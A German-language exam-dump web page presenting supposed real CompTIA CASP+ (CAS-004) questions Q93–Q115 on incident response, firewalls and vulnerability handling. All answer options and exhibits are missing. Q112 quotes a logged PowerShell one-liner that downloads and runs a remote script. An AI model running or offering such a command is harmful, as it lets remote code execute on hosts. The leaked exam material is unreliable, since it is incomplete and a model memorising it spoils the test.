CAS-004 Actual Questions Answers PDF 100% Cover Real Exam Questions [Q93-Q115]


Diesen Beitrag bewerten

CAS-004 Actual Questions Answers PDF 100% Cover Real Exam Questions

CAS-004 Prüfungsfragen und Antworten

Details zur CompTIA CASP+ Prüfung:

Beispielhafte Fragen CompTIA CASP+ Beispielfragen
Prüfungspreis $466 (USD)
Zeitplan Prüfung CompTIA-Marktplatz
Pearson VUE
Dauer 165 Min.
Bücher / Ausbildung CASP+ CAS-004
Prüfung Name CompTIA Advanced Security Practitioner (CASP+)
Anzahl der Fragen 90

 

Q93. Ein Analyst führt einen Schwachstellen-Scan für einen DNS-Server im Internet durch und erhält den folgenden Bericht:

Welches der folgenden Tools sollte der Analyst ZUERST verwenden, um die kritischste Schwachstelle zu validieren?

 
 
 
 

Q94. Bei der Untersuchung eines Sicherheitsvorfalls findet ein Analyst Beweise dafür, dass ein Benutzer einen E-Mail-Anhang von einer unbekannten Quelle geöffnet hat. Kurz nachdem der Benutzer den Anhang geöffnet hatte, kam es bei einer Gruppe von Servern zu einer großen Menge an Netzwerk- und Ressourcenaktivitäten. Bei der Untersuchung der Server stellt der Analyst fest, dass die Server durch Ransomware verschlüsselt wurden, die eine Zahlung innerhalb von 48 Stunden fordert, da sonst alle Daten zerstört werden. Das Unternehmen hat keine Reaktionspläne für Ransomware.
Welches ist der NÄCHSTE Schritt, den der Analyst nach der Meldung des Vorfalls an das Managementteam unternehmen sollte?

 
 
 
 

Q95. Unmittelbar nach der Meldung eines potenziellen Einbruchs erstellt ein Sicherheitstechniker ein forensisches Image des betreffenden Servers als Teil des Verfahrens zur Reaktion auf einen Vorfall im Unternehmen. Was muss geschehen, um die Integrität des Abbilds zu gewährleisten?

 
 
 
 

Q96. Ein Sicherheitsarchitekt prüft die folgende vorgeschlagene Architektur und Konfiguration der Unternehmensfirewall:

Beide Firewalls sind zustandsorientiert und bieten Layer-7-Filterung und -Routing. Das Unternehmen hat die folgenden Anforderungen:
Webserver müssen alle Aktualisierungen über HTTP/S aus dem Unternehmensnetz erhalten.
Webserver sollten keine Kommunikation mit dem Internet initiieren.
Webserver sollten nur mit vorher genehmigten Datenbankservern des Unternehmens verbunden werden.
Die Computer der Mitarbeiter sollten sich nur über die Ports 80 und 443 mit Webdiensten verbinden.
Welche der folgenden Optionen sollte der Architekt empfehlen, um sicherzustellen, dass alle Anforderungen auf die sicherste Weise erfüllt werden? (Wählen Sie zwei aus.)

 
 
 
 
 
 

Q97. Der Chief Information Officer (CIO) einer großen Bank, die für die Erbringung einer Dienstleistung mehrere Drittanbieter einsetzt, ist besorgt über den Umgang mit und die Sicherheit von Kundendaten durch die Beteiligten. Welche der folgenden Maßnahmen sollten ergriffen werden, um das Risiko am besten zu beherrschen?

 
 
 
 

Q98. Eine Organisation plant die Wiederherstellung und Kontinuität des Betriebs im Katastrophenfall.
ANLEITUNGEN
Gehen Sie die folgenden Szenarien und Anweisungen durch. Ordnen Sie jeden relevanten Befund dem betroffenen Host zu.
Nachdem Sie Szenario 3 mit dem/den entsprechenden Host(s) verknüpft haben, klicken Sie auf den Host, um die entsprechende Abhilfemaßnahme für diesen Befund auszuwählen.
Jedes Ergebnis kann mehr als einmal verwendet werden.
Wenn Sie zu einem beliebigen Zeitpunkt den Ausgangszustand der Simulation wiederherstellen möchten, klicken Sie bitte auf die Schaltfläche Alles zurücksetzen.

Q99. Ein Sicherheitsanalytiker prüft den folgenden Bericht zur Bewertung der Schwachstellen:

Welcher der folgenden Punkte sollte ZUERST gepatcht werden, um Angriffe auf Hosts mit Internetanschluss zu minimieren?

 
 
 
 

Q100. Ein Unternehmen vermutet, dass ein Webserver von einem konkurrierenden Unternehmen infiltriert worden ist. Der Sicherheitsingenieur prüft die Webserverprotokolle und stellt Folgendes fest:

Der Sicherheitsingenieur sieht sich den Code zusammen mit einem Entwickler an und stellt fest, dass der Protokolleintrag erstellt wird, wenn die folgende Zeile ausgeführt wird:

Welche der folgenden Sicherheitsmaßnahmen sollte das Unternehmen durchführen?

 
 
 
 

Q101. Den Mitarbeitern eines Unternehmens ist es nicht gestattet, von internationalen Reisen aus auf die Systeme des Unternehmens zuzugreifen. Das E-Mail-System des Unternehmens ist so konfiguriert, dass Logins auf der Grundlage des geografischen Standorts blockiert werden, aber einige Mitarbeiter berichten, dass ihre Mobiltelefone auf Reisen weiterhin E-Mails synchronisieren. Welcher der folgenden Fälle ist am wahrscheinlichsten? (Wählen Sie ZWEI.)

 
 
 
 
 
 

Q102. Ein Unternehmen möchte seine Cybersicherheitsmaßnahmen verstärken und konzentriert sich dabei auf seine Netzwerkinfrastruktur. Die Lösung darf die Verfügbarkeit der Dienste des Unternehmens nicht beeinträchtigen, um sicherzustellen, dass Falschmeldungen nicht den legitimen Datenverkehr beeinträchtigen.
Welche der folgenden Möglichkeiten würde diese Anforderung erfüllen?

 
 
 
 

Q103. Ein Sicherheitsanalytiker untersucht eine Reihe von verdächtigen E-Mails, die von Mitarbeitern an das Sicherheitsteam geschickt wurden. Die E-Mails scheinen von einem aktuellen Geschäftspartner zu stammen und enthalten keine Bilder oder URLs. Die Sicherheitstools, die das Unternehmen einsetzt, haben keine Bilder oder URLs aus den Nachrichten entfernt, stattdessen enthalten die E-Mails nur den folgenden Text im Klartext.

Welche der folgenden Aufgaben sollte der Sicherheitsanalytiker durchführen?

 
 
 
 

Q104. In einer Webanwendung wurde eine hochgradig gefährliche Sicherheitslücke gefunden und in das Unternehmen eingeschleust. Die Schwachstelle könnte es einem unbefugten Benutzer ermöglichen, eine Open-Source-Bibliothek zu nutzen, um privilegierte Benutzerinformationen einzusehen. Das Unternehmen ist nicht bereit, dieses Risiko einzugehen, aber die Entwickler können das Problem nicht sofort beheben.
Welche der folgenden Maßnahmen sollten ergriffen werden, um das Risiko auf ein akzeptables Niveau zu reduzieren, bis das Problem behoben werden kann?

 
 
 
 

Q105. Das SOC eines Unternehmens hat Bedrohungsdaten über eine aktive Kampagne erhalten, die eine bestimmte Schwachstelle ausnutzt.
Das Unternehmen möchte feststellen, ob es durch diese aktive Kampagne gefährdet ist.
Welche der folgenden Möglichkeiten sollte das Unternehmen nutzen, um diese Entscheidung zu treffen?

 
 
 
 

Q106. Ein Auditor überprüft die Protokolle einer Webanwendung, um die Quelle eines Vorfalls zu ermitteln. Die Architektur der Webanwendung umfasst einen über das Internet zugänglichen Anwendungs-Load-Balancer, eine Reihe von Webservern in einem privaten Subnetz, Anwendungsserver und einen Datenbankserver in einer mehrstufigen Konfiguration. Der Application Load Balancer kann die Protokolle nicht speichern. Im Folgenden finden Sie Beispiele für Protokollausschnitte:

Welche der folgenden Empfehlungen sollte der Prüfer aussprechen, um sicherzustellen, dass zukünftige Vorfälle zu den Quellen zurückverfolgt werden können?

 
 
 
 
 

Q107. Ein Entwickler erstellt eine neue mobile Anwendung für ein Unternehmen. Die Anwendung verwendet REST API und TLS 1.2 für die sichere Kommunikation mit dem externen Backend-Server. Aufgrund dieser Konfiguration ist das Unternehmen besorgt über HTTPS-Abfangangriffe.
Welche der folgenden Möglichkeiten wäre die BESTE Lösung gegen diese Art von Angriffen?

 
 
 
 

Q108. Ein Schwachstellenanalytiker hat eine Zero-Day-Schwachstelle in der intern entwickelten Software eines Unternehmens entdeckt. Da das derzeitige Schwachstellenmanagementsystem keine Prüfungen für diese Schwachstelle enthält, wurde ein Ingenieur gebeten, eine solche zu erstellen.
Welche der folgenden Möglichkeiten wäre am besten geeignet, um diese Anforderungen zu erfüllen?

 
 
 
 

Q109. Welches ist das wichtigste Sicherheitsziel bei der Anwendung von Kryptographie auf Kontrollmeldungen, die einem ICS mitteilen, wie viel Strom es ausgeben soll?

 
 
 
 

Q110. Quellen für Geräteereignisprotokolle von der MDM-Software wie folgt:

Welche der folgenden Sicherheitsbedenken und Reaktionsmaßnahmen würden die Risiken, die von dem Gerät in den Protokollen ausgehen, am BESTEN angehen?

 
 
 
 

Q111. Ein Sicherheitsanalytiker bemerkt eine Reihe von SIEM-Ereignissen, die die folgende Aktivität zeigen:

Welche der folgenden Reaktionsmaßnahmen sollte der Analyst ZUERST ergreifen?

 
 
 
 

Q112. Ein Sicherheitsanalytiker hat einen stetigen Anstieg der Anzahl der fehlgeschlagenen Anmeldeversuche bei einem externen Mailserver festgestellt. Bei der Untersuchung einer der Sprungboxen stellte der Analyst in der Protokolldatei Folgendes fest: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois
Welche der folgenden Sicherheitskontrollen hätte die nächste Phase des Angriffs gewarnt und verhindert?

 
 
 
 

Q113. Ein Unternehmen wird immer wieder von Hackern angegriffen, die sich gültige Zugangsdaten verschaffen. Der Chief Information Security Officer (CISO) des Unternehmens hat mehrere Kontrollmechanismen für die Benutzerauthentifizierung installiert, darunter biometrische und tokenbasierte Faktoren. Jede weitere Kontrolle hat den Aufwand und die Komplexität erhöht, konnte aber weitere Einbrüche nicht verhindern. Ein externer Berater evaluiert den Prozess, der derzeit zur Unterstützung der Authentifizierungskontrollen eingesetzt wird. Welche der folgenden Empfehlungen würde das Risiko eines unbefugten Zugriffs am ehesten verringern?

 
 
 
 

Q114. Ein Endpunkt zur Schwachstellenbewertung hat einen Bericht mit den neuesten Erkenntnissen erstellt. Ein Sicherheitsanalytiker muss den Bericht prüfen und eine Prioritätenliste der zu bearbeitenden Punkte erstellen. Welche der folgenden Möglichkeiten sollte der Analyst nutzen, um die Liste schnell zu erstellen?

 
 
 
 

Q115. Ein Unternehmen möchte sein geistiges Eigentum vor Diebstahl schützen. Das Unternehmen hat bereits ACLs und DACs eingesetzt.
Welche der folgenden Maßnahmen sollte das Unternehmen ergreifen, um Datendiebstahl zu verhindern?

 
 
 
 

DumpsMaterials CAS-004 Exam Practice Test Questions: https://www.dumpsmaterials.com/CAS-004-real-torrent.html

         

Eine Antwort hinterlassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Geben Sie den Text aus dem Bild unten ein